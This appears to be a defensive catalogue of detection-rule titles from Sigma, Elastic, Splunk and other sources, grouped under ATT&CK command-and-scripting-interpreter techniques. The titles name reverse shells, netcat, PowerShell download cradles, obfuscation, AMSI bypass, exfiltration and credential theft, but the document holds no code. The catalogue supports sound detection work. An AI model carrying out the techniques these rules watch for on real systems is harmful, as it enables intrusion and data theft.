- Sigma Exchange PowerShell Snap-Ins Usage test
- Kusto Exchange Worker Process Making Remote Call
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma Execution of Powershell Script in Public Folder test
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma FakeUpdates/SocGholish Activity test
- Splunk Get-ForestTrust with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - Empire PowerShell Launch Parameters test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma Hidden Powershell in Link File Pattern test
- Splunk High Entropy Powershell (PowerShell)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket_Empire's WMIExec (Windows Event Log)
- Sigma Import PowerShell Modules From Suspicious Directories test
- Sigma Import PowerShell Modules From Suspicious Directories - ProcCreation test
- Elastic Incoming Execution via PowerShell Remoting production
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Splunk Invoke-Expression Command (PowerShell)
- Splunk Invoke-Expression Command (Sysmon)
- Splunk Invoke-Expression Command (Windows Event Log)
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Lace Tempest PowerShell Evidence Eraser test
- Sigma Lace Tempest PowerShell Launcher test
- Sigma Malicious Base64 Encoded PowerShell Keywords in Command Lines test
- Sigma Malicious Nishang PowerShell Commandlets test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Malicious PowerShell Keywords test
- Splunk Malicious PowerShell Process - Execution Policy Bypass production
- Splunk Malicious PowerShell Process With Obfuscation Techniques production
- Sigma Malicious PowerShell Scripts - FileCreation test
- Sigma Malicious PowerShell Scripts - PoshModule test
- Sigma Malicious ShellIntel PowerShell Commandlets test
- Sigma MERCURY APT Activity test
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Modify Exchange Access Settings (PowerShell)
- Sigma Net WebClient Casing Anomalies test
- Sigma Netcat The Powershell Version test
- Sigma Network Connection Initiated By PowerShell Process test
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New PowerShell Instance Created test
- Splunk Nishang PowershellTCPOneLine production
- Sigma Non Interactive PowerShell Process Spawned test
- Sigma Nslookup PowerShell Download Cradle test
- Sigma NTFS Alternate Data Stream test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Obfuscated PowerShell OneLiner Execution test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Payload downloaded via PowerShell
- Sigma PipeShell exfiltration over named pipes experimental
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential APT FIN7 POWERHOLD Execution test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential Data Exfiltration Activity Via CommandLine Tools test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Downgrade Attack test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Powershell ReverseShell Connection stable
- Sigma Potential POWERTRASH Script Execution test
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Sigma Potential Remote PowerShell Session Initiated test
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Suspicious PowerShell Keywords test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Sigma Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell stable
- Sigma Potentially Suspicious Command Executed Via Run Dialog Box - Registry test
- Sigma Potentially Suspicious PowerShell Child Processes test
- Sigma Potentially Suspicious Powershell Script Execution From Temp Folder test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Splunk PowerShell - Connect To Internet With Hidden Window production
- Splunk PowerShell 4104 Hunting production
- Sigma PowerShell ADRecon Execution test
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Base64 Encoded IEX Cmdlet test
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Sigma PowerShell Called from an Executable Version Mismatch test
- Splunk PowerShell Clipboard Access (PowerShell)
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Sigma PowerShell Core DLL Loaded By Non PowerShell Process test
- Sigma PowerShell Create Local User test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Sigma PowerShell Credential Prompt test
- Splunk PowerShell Domain Enumeration production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Sigma PowerShell Downgrade Attack - PowerShell test
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download Pattern test
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- YARA-L PowerShell DownloadFile
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerShell Enable PowerShell Remoting production
- Splunk PowerShell Environment Variable Execution production
- Splunk Powershell Execute COM Object production
- Sigma Powershell Executed From Headless ConHost Process test
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Sigma Powershell Inline Execution From A File test
- Splunk Powershell Load Module in Meterpreter production
- Splunk PowerShell Loading DotNET into Memory via Reflection production
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma Powershell MsXml COM Object test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Processing Stream Of Data production
- Sigma PowerShell PSAttack test
- Sigma PowerShell Remote Session Creation test
- Splunk PowerShell Script Block With URL Chain production
- Sigma PowerShell Script Run in AppData test
- Sigma PowerShell ShellCode test
- Splunk PowerShell Start or Stop Service production
- Splunk Powershell Using memory As Backing Store production
- Sigma PowerShell Web Access Installation - PsScript test
- YARA-L PowerShell Web Download
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto PowerShell without powershell.exe
- Sigma Powershell XML Execute Command test
- Splunk PowerShell XML Retrieval (PowerShell)
- Splunk PowerShell XML Retrieval (Sysmon)
- Splunk PowerShell XML Retrieval (Windows Event Log)
- Sigma PowerView PowerShell Cmdlets - ScriptBlock test
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Process Activity via Compiled HTML File production
- Elastic Proxy Execution via Console Window Host production
- Sigma PSAsyncShell - Asynchronous TCP Reverse Shell test
- Sigma Raspberry Robin Initial Execution From External Drive test
- Sigma Raspberry Robin Subsequent Execution of Commands test
- Splunk Recon Using WMI Class production
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Elastic Remote File Download via PowerShell production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Sigma Remote PowerShell Sessions Network Connections (WinRM) test
- Sigma Remote Thread Creation Via PowerShell test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Rorschach Ransomware Execution Activity test
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Set Default PowerShell Execution Policy To Unrestricted or Bypass production
- Sigma Silence.EDA Detection test
- Sigma SQL Client Tools PowerShell Session Detection test
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Sigma Suspicious Encoded PowerShell Command Line test
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Execution of Powershell with Base64 test
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Execution From Internet Hosted WebDav Share test
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious Interactive PowerShell as SYSTEM test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Splunk Suspicious Powershell (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Sigma Suspicious PowerShell Download - PoshModule test
- Sigma Suspicious PowerShell Download - Powershell Script test
- Sigma Suspicious PowerShell Download and Execute Pattern test
- Sigma Suspicious PowerShell Encoded Command Patterns test
- Sigma Suspicious PowerShell IEX Execution Patterns test
- Sigma Suspicious PowerShell Invocation From Script Engines test
- Sigma Suspicious PowerShell Invocations - Generic test
- Sigma Suspicious PowerShell Invocations - Generic - PowerShell Module test
- Sigma Suspicious PowerShell Invocations - Specific test
- Sigma Suspicious PowerShell Invocations - Specific - PowerShell Module test
- Sigma Suspicious PowerShell Parameter Substring test
- Splunk Suspicious PowerShell Parameter Substring (PowerShell)
- Splunk Suspicious PowerShell Parameter Substring (Sysmon)
- Splunk Suspicious PowerShell Parameter Substring (Windows Event Log)
- Sigma Suspicious PowerShell Parent Process test
- Sigma Suspicious PrinterPorts Creation (CVE-2020-1048) test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma Suspicious XOR Encoded PowerShell Command test
- Elastic Suspicious Zoom Child Process production
- Elastic System Shells via Services production
- Sigma TropicTrooper Campaign November 2018 stable
- Sigma Turla Group Commands May 2020 test
- Sigma UNC2452 PowerShell Pattern test
- Sigma UNC2452 Process Creation Patterns test
- Sigma Uncommon PowerShell Hosts test
- Splunk Unloading AMSI via Reflection production
- Sigma Unusually Long PowerShell CommandLine test
- Sigma Usage Of Web Request Commands And Cmdlets test
- Sigma Usage Of Web Request Commands And Cmdlets - ScriptBlock test
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Elastic Volume Shadow Copy Deletion via PowerShell production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
- Splunk Windows Account Access Removal via Logoff Exec production
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Crowdstrike RTR Script Execution production
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Elastic Windows Defender Exclusions Added via PowerShell production
- Splunk Windows Enable PowerShell Web Access production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows File Download Via PowerShell production
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Powershell Cryptography Namespace production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Get CIMInstance Remote Computer production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Splunk Windows Powershell Logoff User via Quser production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
- Splunk Windows PowerShell Process With Malicious String production
- Splunk Windows Powershell RemoteSigned File production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows PowerShell Script Block With Malicious String production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows PowerShell WMI Win32 ScheduledJob production
- Splunk Windows PowGoop Beacon Decoding production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows Software Discovery Via PowerShell production
- Splunk Windows SSH Proxy Command production
- Splunk Windows Suspicious React or Next.js Child Process production
- Sigma WMImplant Hack Tool test
Command and Scripting Interpreter: AppleScript T1059.002 2 rules
- Sigma Atomic MacOS Stealer - FileGrabber Activity experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
Command and Scripting Interpreter: Windows Command Shell T1059.003 138 rules
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Binary Content Copy via Cmd.exe production
- Splunk CMD Carry Out String Command Parameter production
- Splunk CMD Echo Pipe - Escalation production
- Splunk CMD execution with _c (PowerShell)
- Splunk CMD execution with _c (Sysmon)
- Splunk CMD execution with _c (Windows Event Log)
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Execution via SolarWinds Process production
- Splunk Command Line .cmd Execution (Sysmon)
- Splunk Command Line .cmd Execution (Windows Event Log)
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Command-Line Interface Execution (PowerShell)
- Splunk Command-Line Interface Execution (Sysmon)
- Splunk Command-Line Interface Execution (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Sigma Conhost.exe CommandLine Path Traversal test
- Elastic Delayed Execution via Ping production
- Splunk Detect Prohibited Applications Spawning cmd exe production
- Splunk Detect Use of cmd exe to Launch Script Interpreters production
- Sigma DNS Query by Finger Utility experimental
- Sigma Elise Backdoor Activity test
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Kusto Exchange Worker Process Making Remote Call
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Jlaive In-Memory Assembly Execution test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma Headless Process Launched Via Conhost.EXE test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Metasploit reverse shell injection in SQL Server experimental
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Operator Bloopers Cobalt Strike Commands test
- Sigma Operator Bloopers Cobalt Strike Modules test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Sigma Potential APT FIN7 Exploitation Activity test
- Sigma Potential Baby Shark Malware Activity test
- Elastic Potential Command Shell via NetCat production
- Sigma Potential CommandLine Path Traversal Via Cmd.EXE test
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Elastic Potential SharpRDP Behavior production
- Splunk PowerShell Downgrade (PowerShell)
- Splunk PowerShell Downgrade (Sysmon)
- Splunk PowerShell Downgrade (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Execute Batch Script test
- Sigma Powershell Executed From Headless ConHost Process test
- Elastic Process Activity via Compiled HTML File production
- Elastic Proxy Execution via Console Window Host production
- Sigma PUA - AdvancedRun Execution test
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Sigma Read Contents From Stdin Via Cmd.EXE test
- Sigma Remote Access Tool - ScreenConnect Command Execution test
- Sigma Remote Access Tool - ScreenConnect File Transfer test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution test
- Sigma Remote Access Tool - ScreenConnect Temporary File test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Sigma Rorschach Ransomware Execution Activity test
- Splunk Ryuk Wake on LAN Command production
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Sigma Serial console process spawning CMD shell (via command) experimental
- Elastic Service Control Spawned via Script Interpreter production
- Splunk SharpHound Enumeration (Windows Event Log)
- Sigma Sofacy Trojan Loader Activity test
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Command Prompt Network Connection production
- Sigma Suspicious CrushFTP Child Process experimental
- Splunk Suspicious Executable by Powershell (EDR)
- Splunk Suspicious Executable by Powershell (Sysmon)
- Splunk Suspicious Executable by Powershell (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Sigma Suspicious HWP Sub Processes test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Zoom Child Process production
- Elastic System Information Discovery via Windows Command Shell production
- Elastic System Shells via Services production
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk Windows Command Shell DCRat ForkBomb Payload production
- Splunk Windows File Association Modification via Ftype production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows Powershell History File Deletion production
- Splunk Windows PowerShell Invoke-Sqlcmd Execution production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows Shell Process from CrushFTP production
- Splunk Windows SQLCMD Execution production
- Splunk Windows Suspicious React or Next.js Child Process production
- Elastic Windows System Information Discovery production
- Splunk Windows TinyCC Shellcode Execution production
- Sigma ZxShell Malware test
Command and Scripting Interpreter: Unix Shell T1059.004 11 rules
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Execution via Windows Subsystem for Linux production
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Elastic Windows Subsystem for Linux Distribution Installed production
Command and Scripting Interpreter: Visual Basic T1059.005 57 rules
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Elastic Delayed Execution via Ping production
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Splunk Execute Javascript With Jscript COM CLSID production
- Elastic Execution of a Downloaded Windows Script production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma MMC Loading Script Engines DLLs experimental
- Sigma Potential APT10 Cloud Hopper Activity test
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Sigma Potential QBot Activity stable
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Elastic Remote File Download via Script Interpreter production
- Elastic Remote XSL Script Execution via COM production
- Elastic Scheduled Task Created by a Windows Script production
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious Process DNS Query Known Abuse Web Services production
- Splunk Suspicious Process With Discord DNS Query production
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Scripting in a WMI Consumer test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Splunk Vbscript Execution Using Wscript App production
